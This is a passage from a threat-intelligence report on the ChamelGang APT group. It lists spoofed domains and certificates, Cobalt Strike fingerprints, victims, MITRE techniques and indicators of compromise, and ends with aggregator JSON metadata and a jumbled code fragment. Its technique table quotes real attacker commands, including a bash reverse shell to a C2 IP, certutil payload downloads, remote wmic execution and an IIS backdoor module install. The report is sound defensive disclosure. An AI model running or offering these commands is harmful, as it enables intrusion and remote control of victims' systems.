table: PID PPID Arch Name User\r\nA Terminate and delete the specified process\r\n4. Network infrastructure\r\nWhen creating the network infrastructure, the attackers tried to disguise themselves as legitimate services as much as\r\npossible. The attackers registered phishing domains that imitate legitimate services of Microsoft, TrendMicro, McAfee, IBM\r\nand Google, including their support services, content delivery (cdn), and updates. Here are a number of discovered domains:\r\nnewtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com, mcafee-upgrade.com. The APT group also\r\nplaced SSL certificates on its servers, which also imitated legitimate ones: github.com, www.ibm.com, jquery.com,\r\nupdate.microsoft-support.net.\r\nFigure 35. One of the SSL certificates on the ChamelGang server\r\nInformation about phishing certificates:\r\nIssuer C=US, ST=, L=, O=jQuery, OU=Certificate Authority, CN=jquery.com\r\nSerial number 0x368b8e88\r\nFingerprint\r\nbc9e9df8738709223e53d27ba1872f06\r\n0845d108fbd0860bbbc0df0f4de96f41a93ff0f0\r\ne3cdf05b9afa03b16971b4140afed4100408d6e48d18c9b5d5957e380ba3f33f\r\nJARM 07d14d16d21d21d07c42d41d00041d58c7162162b6a603d3d90a2b76865b53\r\nIssuer C=US, ST=Armonk, L=New York, O=IBM, OU=IBM, CN=www.ibm.com\r\nSerial number 0x4405609c\r\nFingerprint b2422d23e2d59a5807216301802f19d8\r\n7ad381d016d138198c4bd5b89a74f0e3c6e2e786\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 20 of 31\n\n137c4635ede8d21050026ca2c26cae1c954955b44e285d68d17d3c11174983cb\r\nJARM 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1\r\nIssuer C=US, ST=Armonk, L=New York, O=IBM, OU=IBM, CN=www.ibm.com\r\nSerial number 0x316b328c\r\nFingerprint\r\nd4916d7a18357716753c1e6431d5c160\r\n4df235e385a510639da6aebb325962d0fc2345fc\r\n3da87b067a687d95a5f37f28af20c325227e158a026c442aaa20b91159e6d161\r\nJARM 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1\r\nIssuer C=US, ST=Armonk, L=New York, O=IBM, OU=IBM, CN=www.ibm.com\r\nSerial number 0xfdc788a9c57394e4\r\nFingerprint\r\n155a73dffb275fbf3c4266720fcc97a2\r\n3fc1b7d5168a01e4aba2fcfc9513f40346e9a52b\r\ncca094b19f51b00ded930cfffe35ce616e89efe7863f3ff1812474ee5e827619\r\nJARM 2ad2ad16d2ad2ad22c42d42d00042d58c7162162b6a603d3d90a2b76865b53\r\nIssuer\r\nC=US, ST=Redmond, L=Washington, O=Microsoft Corporation, OU=Microsoft IT,\r\nCN=catalog.update.microsoft.com\r\nSerial\r\nnumber\r\n0x3c3ca23b\r\nFingerprint\r\n98742ed94fa10befdae2103164d3dfd1\r\nbf8fc252ca92408b1a7b418a70f8545eeabe8782\r\n52897cdfeca4452ac76a3f89fb05118c999fb707959a789f37b235275a5fdd9d\r\nJARM -\r\nIssuer\r\nC=US, ST=Redmond, L=Washington, O=Microsoft Corporation, OU=Microsoft IT,\r\nCN=catalog.update.microsoft.com\r\nSerial\r\nnumber\r\n0x28fc9f85\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 21 of 31\n\nFingerprint\r\n6b493427de4740d212393e6fc54ba643\r\n28089297e1fe2a9f1a32988184e426c2d030426c\r\n1c3edb30e6528c9c6381a8e9d988de1dc299b26aee0d0ff54597a279d269723d\r\nJARM -\r\nIssuer C=US, ST=Redmond, L=Washington, O=localhost, OU=localhost, CN=www.localhost.com\r\nSerial number 0x6e355c4e\r\nFingerprint\r\nbaf951e0202ba599512484e3a49dabe6\r\n5188a5381ea927ed46bffd59ad78c6ef8cc564df\r\na49251716b1f5b88281fd688c8350fe35fa7e922e34ab39e3bf1d96db5f6374e\r\nJARM\r\n07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1\r\n2ad2ad0002ad2ad22c42d42d000000faabb8fd156aa8b4d8a37853e1063261\r\nIssuer C=US, ST=Redmond, L=Washington, O=localhost, OU=localhost, CN=www.localhost.com\r\nSerial number 0x40ff5bd3\r\nFingerprint\r\n6f9d1ed42dadcca5ebc66ae0418d00d1\r\n3ec7e6bbe95c46752bf7ee7e2edfa4425824bbde\r\n02e767c8752b0ddd3b2203f26b09063cdc3a1d83b3a9d493f433f106074c2120\r\nJARM 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1\r\nThe data obtained via JARM suggests that the attackers use the Cobalt Strike framework on servers connected to the\r\nnetwork infrastructure. During the attack, the group also used Beacon (from the Cobalt Strike framework) as the main\r\npayload. This fact further bolsters our assumption that this network infrastructure was created by the same attackers.\r\nJARM Service Source\r\n07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1\r\nCobalt\r\nStrike\r\nhttps://github.com/cedowens/C2-JARM\r\n07d14d16d21d21d07c42d41d00041d58c7162162b6a603d3d90a2b76865b53\r\nCobalt\r\nStrike\r\nhttps://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/\r\n2ad2ad16d2ad2ad22c42d42d00042d58c7162162b6a603d3d90a2b76865b53\r\nCobalt\r\nStrike\r\nhttps://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 22 of 31\n\n2ad2ad0002ad2ad22c42d42d000000faabb8fd156aa8b4d8a37853e1063261\r\npython3\r\nhttp.server\r\nhttps://github.com/cedowens/C2-JARM\r\nThe attackers' servers were mainly located on several subnets:\r\n154.210.12.0/24\r\n194.113.172.0/24\r\n45.131.25.0/24\r\n45.158.35.0/24\r\n45.195.1.0/24\r\n45.91.24.0/24\r\nAccording to WHOIS data and SOA records of some of the domains, we managed to obtain email addresses with which they\r\nwere registered or used as contact addresses. Note that for this purpose, the attackers used the ProtonMail mail service with\r\nbuilt-in encryption.\r\nDomain Email\r\nnewtrendmicro[.]com f4ckha123@protonmail.com\r\nmicrosoft-support[.]net tongscan911@protonmail.com\r\nmcafee-upgrade[.]com trend1to1@protonmail.com\r\nmicrosofed[.]com\r\ncdn-chrome[.]com\r\ntrend1to2@protonmail.com\r\nTo complicate the analysis of the network infrastructure, the attackers hid the IP addresses of their domains behind\r\nCloudFlare.\r\n5. Victims\r\nIn addition to two organizations in Russia (fuel and energy and aviation production companies) during further threat\r\nintelligence of the group activity, we identified 13 more compromised organizations in ten countries of the world: the United\r\nStates, Japan, Turkey, Taiwan, Vietnam, India, Afghanistan, Lithuania and Nepal. In particular, compromised government\r\nservers were found in the last four. Microsoft Exchange Server was located on almost all compromised nodes. In all\r\nlikelihood, the nodes were compromised using vulnerabilities such as ProxyLogon and ProxyShell. All the victims were\r\nnotified by the national CERTs.\r\nConclusions\r\nTrusted relationship attacks are rare today due to the complexity of their execution. Using this method in the first case, the\r\nChamelGang group was able to achieve its goal and steal data from the compromised network. Also, the group tried to\r\ndisguise its activity as legitimate, using OS features and plausible phishing domains. In addition, the attackers left a passive\r\nbackdoor DoorMe in the form of a module for the IIS server. During further investigation of the activity of the ChamelGang\r\ngroup, we found compromised government servers in five countries. Also, attackers began to actively exploit the ProxyShell\r\nvulnerability. The increase in the number of cases of its exploitation has been confirmed by FireEye's recent study. If large\r\ncompanies do not build a structured process and timely respond to the emergence of new threats, they will continue to fall\r\nvictim to various APT groups that quickly adopt new methods of attacks, including those described in this report.\r\nWe predict that the trend using the supply chain method will continue. New APT groups using this method to achieve their\r\ngoals will appear on stage.\r\nAuthors: Aleksandr Grigorian, Daniil Koloskov, Denis Kuvshinov, Stanislav Rakovsky, Positive Technologies\r\nThe article's authors thank the incident response and threat intelligence teams PT Expert Security Center for their help in\r\ndrafting the story.\r\nVerdicts of our products\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 23 of 31\n\nPT Sandbox\r\ntool_linux_ZZ_LinuxPrivilegeElevator__Trojan\r\ntool_linux_ZZ_tsh__Backdoor__Opensource__Tool\r\ntool_mem_ZZ_CobaltStrike__Backdoor__Strings\r\ntool_mem_ZZ_CobaltStrike__Backdoor__x64Beacon\r\ntool_mem_ZZ_FRP__RiskTool\r\ntool_multi_ZZ_FRP__RiskTool\r\ntool_win_ZZ_CobaltStrike__Dropper__x64SideloadingLibrary\r\ntool_win_ZZ_proxyT__HackTool\r\ntool_win64_ZZ_Doorme__Backdoor__IIS__Native__Module\r\nBackdoor.Win32.CobaltStrike.a\r\nTrojan.Win32.Generic.a\r\nPT Network Attack Discovery\r\nREMOTE [PTsecurity] Possible Cobalt Strike\r\nsid: 10006705;\r\nREMOTE [PTsecurity] Cobalt Strike\r\nsid: 10006706;\r\nREMOTE [PTsecurity] Possible Cobalt Strike\r\nsid: 10006707;\r\nPT MaxPatrol SIEM\r\nApplication_Whitelisting_Bypass_through_rundll32\r\nDetect_Possible_IIS_Native_Module_Installation\r\nRecommendations\r\nRegularly install security updates (in particular, to eliminate such vulnerabilities as ProxyLogon and ProxyShell).\r\nUse only the latest OS and software versions.\r\nCheck the configuration file %windir%\\system32\\inetsrv\\config\\ApplicationHost.config for malicious (or suspicious)\r\nmodules.\r\nTrack the execution of commands of the parent process w3wp.exe in the system (OWA service) and the launch of the\r\nconsole utility AppCmd.exe.\r\nUse indicators of compromise (see the IOCs section) to search for infected servers.\r\nMITRE TTPs\r\nID Name Description\r\nResource Development\r\nT1583.001 Domains\r\nThe attackers obtained domains that imitated legitimate ones. Examples:\r\nnewtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com,\r\nmcafee-upgrade.com, centralgoogle.com\r\nT1587.001 Malware\r\nThe attackers developed their own malware to carry out the attack. Examples:\r\nDoorMe backdoor, ProxyTest\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 24 of 31\n\nT1588.002 Tool\r\nThe attackers used the public Cobalt Strike tool, which requires a paid license to\r\nwork with. Examples: Watermark – 1936770133\r\nT1588.004 Digital Certificates\r\nThe attackers placed their own SSL certificates, which imitated legitimate ones.\r\nExamples: github.com, www.ibm.com, jquery.com, update.microsoft-support.net\r\nInitial Access\r\nT1199 Trusted Relationship\r\nThe group compromised a subsidiary and penetrated the target company's\r\nnetwork through it\r\nT1190\r\nExploit Public-Facing Application\r\nThe attackers used a public exploit to gain access to the infrastructure connected\r\nto the infrastructure of the target organization. Examples: CVE-2017-12149,\r\nCVE-2021-34473, CVE-2021-34523, CVE-2021-31207\r\nExecution\r\nT1047\r\nWindows\r\nManagement\r\nInstrumentation\r\nThe attackers used the wmic utility to execute commands on the hosts. Examples:\r\nC:\\Windows\\system32\\cmd.exe /C wmic /node:\"host\" process call create\r\n\"c:\\windows\\system32\\cmd.exe /c certutil -urlcache -f -split http://42.99.116[.]14/\r\nc:\\windows\\temp\\MpKsl15169faf \u003e c:\\windows\\temp\\_1622775917806 2\u003e\u00261\"\r\nT1059.003\r\nWindows Command\r\nShell\r\nThe attackers used the command interpreter \"cmd.exe /c\" to execute commands\r\non the hosts. Examples: cmd.exe /C copy hosts.bak\r\nc:\\windows\\system32\\drivers\\etc\\hosts\r\nPersistence\r\nT1505.003 Web Shell\r\nThe attackers used various web shells, as well as the native module of the IIS\r\nserver to manage the infected hosts. Examples:\r\nc:\\windows\\system32\\inetsrv\\appcmd.exe install module\r\n/name:FastCgiModule_en64bit /image:%windir%\\System32\\inetsrv\\iisfcgix64.dll\r\nT1574.001\r\nDLL Search Order\r\nHijacking\r\nThe attackers used the appropriate technique to execute the payload. Examples:\r\noci.dll, wlbsctrl.dll\r\nPrivilege Escalation\r\nT1068\r\nExploitation for\r\nPrivilege Escalation\r\nThe attackers used exploits to escalate privileges on the available hosts.\r\nExamples: EternalBlue\r\nDefense Evasion\r\nT1036.003\r\nMasquerading:\r\nRename System\r\nUtilities\r\nThe attackers used malicious programs that copy the names of system utilities to\r\navoid detection. Examples: avp.exe, oci.dll, wlbsctrl.dll, modrpflt.dll,\r\nprotsdown.dll\r\nT1055 Process Injection\r\nThe attackers used malicious programs that inject malicious payload into system\r\nprocesses\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 25 of 31\n\nT1070\r\nIndicator Removal\r\non Host\r\nThe attackers deleted the malware samples to avoid detection\r\nT1078.003 Local Accounts\r\nThe attackers used compromised local administrator accounts to launch the\r\nmalware with escalated privileges to move laterally within the compromised\r\nnetwork\r\nT1140\r\nDeobfuscate/Decode\r\nFiles or Information\r\nThe main malicious payload is encrypted with the AES algorithm\r\nT1218.011\r\nSigned Binary\r\nProxy Execution:\r\nRundll32\r\nThe attackers used rundll32.exe to execute the payload, as well as the installer\r\nthat loaded the DLL using rundll32. Example:\r\nC:\\\\Windows\\\\system32\\\\rundll32.exe\\\"\r\nC:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\r\n\\\\\\\\host\\\\c$\\\\windows\\\\web\\\\20210524115241_pffqscox.3b1; rundll32.exe\r\nssd.dll,Regist c:\\windows\\web\\ssd.en adminxadmin\r\nT1564.001\r\nHide Artifacts:\r\nHidden Files and\r\nDirectories\r\nThe attackers created hidden files in Unix-like systems\r\nT1070.006\r\nIndicator Removal\r\non Host: Timestomp\r\nThe attackers changed the time of creation of its malware and utilities in the file\r\nsystem by indicating an earlier period of time\r\nDiscovery\r\nT1012 Query Registry\r\nThe attackers used the reg utility to edit the Windows registry. Example: reg\r\nquery\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\r\nSettings\r\nT1016.001\r\nSystem Network\r\nConfiguration\r\nDiscovery: Internet\r\nConnection\r\nDiscovery\r\nThe attackers used the curl utility to check the Internet connection and\r\ncommunicate with the C2 servers. Examples: curl -I -v https://*.*.*.*\r\nT1018\r\nRemote System\r\nDiscovery\r\nThe attackers used the nslookup and ping utilities to conduct network\r\nreconnaissance. Examples: nslookup -type=ns victim.local *.*.*.*, ping -a -n 1\r\n*.*.*.*\r\nT1049\r\nSystem Network\r\nConnections\r\nDiscovery\r\nThe attackers used the netstat utility to check network connections. Examples:\r\nc:\\\\windows\\\\system32\\\\cmd.exe /c netstat -anop tcp \\u003e\r\nc:\\\\windows\\\\temp\\\\_1622169989165\r\nT1057 Process Discovery The attackers used the tasklist utility to obtain information about the processes\r\nT1069.001 Local Groups The attackers used the net group utility to detect users\r\nT1082\r\nSystem Information\r\nDiscovery\r\nThe attackers used the ver and systeminfo utilities to conduct reconnaissance on\r\nthe hosts\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 26 of 31\n\nT1087.001 Local Account The attackers used the net user and quser utilities to detect users\r\nLateral Movement\r\nT1210\r\nExploitation of\r\nRemote Services\r\nThe attackers exploited vulnerability MS17-010 (EternalBlue) to move laterally\r\nto other systems in the compromised network\r\nCollection\r\nT1560\r\nArchive Collected\r\nData\r\nThe attackers ran a console command to create an archive of files of types\r\ninteresting to them from user directories on the infected hosts. Examples: 7z.exe a\r\n-padminadmin -mhe=on -mx9 his.7z hist*.\r\nCommand and Control (C2)\r\nT1071\r\nApplication Layer\r\nProtocol\r\nThe attackers used the HTTPS Cobalt Strike Beacon, as well as a version with\r\nnamed channels\r\nT1090 Proxy\r\nThe attackers used proxy servers inside the network. Examples: FRP, bash -i \u003e\u0026\r\n/dev/tcp/115.144.122.8/5555 0\u003e\u00261.\r\nT1105\r\nIngress Tool\r\nTransfer\r\nThe attackers downloaded additional utilities from the C2 server using the certutil\r\nutility. Examples: certutil -urlcache -f -split http://42.99.116[.]14/.\r\nT1572 Protocol Tunneling The attackers used network traffic tunneling tools. Examples: Neo-reGeorg\r\nExfiltration\r\nT1041\r\nExfiltration Over C2\r\nChannel\r\nThe attackers uploaded the stolen files to the C2 servers\r\nIOCs\r\nFile indicators\r\nFile SHA-256 MD5\r\n- 6793e9299cab4cd07d4ddf35e03b32a05b0e965b3691d258ec2568402cf8d28f 206e15f750f7fee32b110f5c79cf068b\r\n- e8ee5b0d6b683407aa9cb091bf92273af0e287d4e7daa94ca93cd230e94df37a 4e49adfed966f5d54cd1b89e1acb18ef\r\n- d4e3747658e1a9e6587da411dc944597af95dd49b07126b8b090c7677ee30674 5d09c85b349d457471b18b598bb63e5d\r\n.vim 16b54dc11dbe2948467a10d68728811b03c12b12f7b29e53d0985fa07e29f9b7 cab9ecc235a0fe544e01dd6b30463f11\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 27 of 31\n\navp.exe ba867705eb986d1975abcf2f2b90ee2c7fdd09255076823cdd85c0feeea15a1b 371a13ca89bf3b01346a8f7631a9be75\r\ncurlt.exe f1afce3be297fa6185903274b3b44cd263b4c1ea89e8282334bc5771c53af1c5 8550e586e7ae73863de0c5a6c11c5dc1\r\ndlang.dat 8e0e5ec7ed16e5fb1e8980a3ec6e3c5982fd8fa4cfc31428a6638950bbe5607a 1a7f1012ea071e1b9955e502fab3023c\r\ndlang.dat b9a231496682cd6bed978fb1b2b15986211e5c38a13cbb246de3dcf1d8db41f4 6a3c69384237078b6ab03ab7c38970ca\r\ndlang.dat d831a87c6abd1bbb5a9ac9e1aac06a3d9b81b6e474bdc0c78e1908e26a6166b3 90cc1835823d5f86cd1947b03e6111a9\r\niis64.dll,\r\niisfcgix64.dll,\r\nmodrpflt.dll,\r\nhttpsrfm64.dll\r\n538d423e3a8a884aac2d80b248d194388d3520cc508990da14c0a1384e7eddbd 23f06ae1f9c78d2dc8f8d8b3cb3c5978\r\nmodrpflt.dll 73e9f7b9d22159f485b1c733981261ddc26fe7fcd104babfcc60369b354ccbe7 905aa9b9055592b585edb89eda236984\r\nmodrpflt.dll 27b64e64b6787ad0682eac8aa42f9cd423518a92c4f6ce98596339363eeeebcc 41cfb3db9837377e7f3a4a18d5b444e1\r\nMpCmdRun.log.1 be147fe9110e32b4c4558900f63888756941bf0d0519dc25c075509457748c25 8dee79145aac1e5ffcd801ef07390fde\r\nnfsd 21d41a206cd12784473bec587a0b014b7cfd29c8da958531c773547402a16908 ea7d091e2d565f452b4735bc9ee966e6\r\no.r 9dd08351c1094e29f279e66731bea55f546e534fdff8688b16b44b86f67df6cb 4cb26fd5ca9bc238803e0971914039e2\r\noci.dll 60758fd51c29c09b989be480107f36e7c5552e99a283588ad31c0f87a9353f69 cf0cc54e91b59ccafdc36a8f4b04f9c6\r\noci.dll 8f349ea483b4986b90384bcdde30666669303ede91f9261f40213bac9e44f286 cd4750c84f1a89f0db6c3d68a6530ad6\r\noci.dll 9f0fc02c4cc5d77f28f3828a361afc93459c888acb1a186e874a60ead3c68ba6 6164f85c6273ea1bf7e2f051ceaacf31\r\noci.dll 3b3d097873899e1a1d99c2ba5aedfc68b67f30acfeefc74e30eb02647729602f 57eb643949a9a0fcd20dfe59af02c8d2\r\nocilib.dll e18546ad747fa063285f24264f9dc3d452c9eb94dc7f1e87b5a8b0677bbf78d7 9c519480c8dd187222e32711a59c4d3c\r\nold.awk 21d41a206cd12784473bec587a0b014b7cfd29c8da958531c773547402a16908 ea7d091e2d565f452b4735bc9ee966e6\r\np.exe, proxyT.exe f1afce3be297fa6185903274b3b44cd263b4c1ea89e8282334bc5771c53af1c5 8550e586e7ae73863de0c5a6c11c5dc1\r\nprotsdown.dll be34984240e19e64eebcf7f31be9d1dee3defdefb7c9c5de77693527cfb89333 02da966d81c83867dbba69fba2954366\r\nRunCheckConfig.class c6b0ea8e61dffe61737911cceafdf281c9e656e87365e9119184e4f42bd42c11 d3888adb6b71cb60e18c37ea16dbd502\r\nsiiHost.exe 5c61d82b42c91c387d5ea6e245056b7a8aa213fcafe08c3a72e1866554931290 c18d3128042528e4a1ea9e34a9300bad\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 28 of 31\n\nsiihost.exe eb4a359c73c31e262e17a6bc2ccefa20429c3f5e2f6e9c521b9ad0ff96fd6ce0 8b8dc2f6fcb503092d57ec1857ddbddc\r\nssconf e3af2ef75033f3ececfd102ca116476397bac6244a8baafb1adebbe8d79c292e e4f785396fc10f0c200e0743cf75666c\r\nsshost.exe ba867705eb986d1975abcf2f2b90ee2c7fdd09255076823cdd85c0feeea15a1b 371a13ca89bf3b01346a8f7631a9be75\r\ntcs.jsp dbf16553507202fbd1aed5057df92d11b88563585ae9bcc517f584826fe4819d d19e9d9c648faeb92fd69b5bbf2e0c6e\r\ntunnel.jsp 8491a786a3a00549f35302160c70e6b8cca6e9792be82e0092e7444850ebdfe9 6dace1bf8d7d3b8b1d21a5a32217406d\r\nwl 23403a06e470420b8f02d3c352f08446146920412d02444771b42c561d69ba83 81ab2303c56b563c106ec0f454b5da83\r\nwl.dll 132688d482129c3935577e73de15f4cc5f382bd511c249d19adbb78b9f1d16c3 42f1215a4d6261c2d5ee28eecb60bc1c\r\nwlbsctrl.dll 373974f2e7933ec8b6eb7afbc98d2d4e0cfc348321864aaf1bbaf66d4d9ef83b 5fb9ea9b063548193bbebc3f8f2b193c\r\nwlbsctrl.dll 4b9701472ab1aabe7ea5a15146d21a9ebff60fe8077efb013d54969ff2b67b39 b701f60803dc1e240cae8e48cb9582ef\r\nNetwork indicators\r\nsoftupdate-online.top\r\ninternet.softupdate-online.top\r\nupdate.softupdate-online.top\r\ndownload.softupdate-online.top\r\nonline.softupdate-online.top\r\ndownloads.softupdate-online.top\r\nmcafee-service.us.com\r\ncn.mcafee-service.us.com\r\nen.mcafee-service.us.com\r\nwww.mcafee-service.us.com\r\nmcafee-upgrade.com\r\ntw.mcafee-upgrade.com\r\nwww.mcafee-upgrade.com\r\nssl.mcafee-upgrade.com\r\ntest.mcafee-upgrade.com\r\nus.mcafee-upgrade.com\r\nmicrosoft-support.net\r\nwww.microsoft-support.net\r\nos.microsoft-support.net\r\ndocs.microsoft-support.net\r\ntstartel.org\r\napp.tstartel.org\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 29 of 31\n\nmail.tstartel.org\r\nwww.tstartel.org\r\nwebmail.tstartel.org\r\nnewtrendmicro.com\r\nauth.newtrendmicro.com\r\nupgrade.newtrendmicro.com\r\ncontents.newtrendmicro.com\r\ncontent.newtrendmicro.com\r\nwww.newtrendmicro.com\r\nmarket.newtrendmicro.com\r\ncentralgoogle.com\r\napp.centralgoogle.com\r\nderbox.centralgoogle.com\r\ncontent.centralgoogle.com\r\ncollector.centralgoogle.com\r\nibmlotus.net\r\nappupdate.ibmlotus.net\r\nwww.ibmlotus.net\r\nmail.ibmlotus.net\r\nhelpdisk.ibmlotus.net\r\nupgrade.ibmlotus.net\r\nsearch.ibmlotus.net\r\nmicrosofed.com\r\napi.microsofed.com\r\ncdn-chrome.com\r\nlogin.cdn-chrome.com\r\nfunding-exchange.org\r\nsnn1.mhysl.org\r\nsnn2.mhysl.org\r\nsnn3.mhysl.org\r\nstatic.mhysl.org\r\nkaspernsky.com\r\nupdate.kaspernsky.com\r\n103.151.228.119\r\n103.80.134.159\r\n115.144.122.8\r\n172.104.109.12\r\n42.99.116.14\r\n45.91.24.73\r\n91.204.227.130\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 30 of 31\n\nSource: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 31 of 31\n\nwhich is required for registering backdoor functionality. the native module—it We did not find any mention initializes an instance of a similar backdoor of the DoorMe in public sources. class. The name alludes to\n__int64 __fastcall RegisterModule(__int64 a1, __int64 a2)\n{ \n_QWORD *v3; // rax \nv3 = operator new(8ui64); \n*v3 = \u0026Doorme::`vftable'; \nreturn (*(*a2 + 24i64))(a2, v3, 0x100i64); \n} \n Page 15 of 31", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3" ], "report_names": [ "#id3" ], "threat_actors": [ { "id": "4434c71b-c424-4c06-b923-4f3f54f24f40", "created_at": "2022-10-25T16:07:23.453526Z", "updated_at": "2026-04-10T02:00:04.611408Z", "deleted_at": null, "main_name": "ChamelGang", "aliases": [ "CamoFei" ], "source_name": "ETDA:ChamelGang", "tools": [ "7-Zip", "Agentemis", "BeaconLoader", "Cobalt Strike", "CobaltStrike", "DoorMe", "FRP", "Fast Reverse Proxy", "ProxyT", "Tiny SHell", "cobeacon", "tsh" ], "source_id": "ETDA", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a0673493-5872-49a0-8d0d-4391302cff01", "created_at": "2023-03-04T02:01:54.10107Z", "updated_at": "2026-04-10T02:00:03.358084Z", "deleted_at": null, "main_name": "Chamelgang", "aliases": [ "CamoFei" ], "source_name": "MISPGALAXY:Chamelgang", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434008, "ts_updated_at": 1775826774, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": 